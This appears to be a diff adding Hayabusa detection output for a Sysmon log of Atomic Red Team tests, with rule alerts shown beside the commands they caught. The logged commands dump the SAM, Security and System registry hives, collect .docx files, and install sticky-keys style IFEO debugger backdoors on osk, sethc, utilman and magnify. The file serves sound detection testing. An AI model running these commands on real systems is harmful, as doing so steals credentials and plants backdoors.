+2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 747F3D96-D890-5D31-0000-0010A5383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 747F3D96-D89A-5D31-0000-0010F2703200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
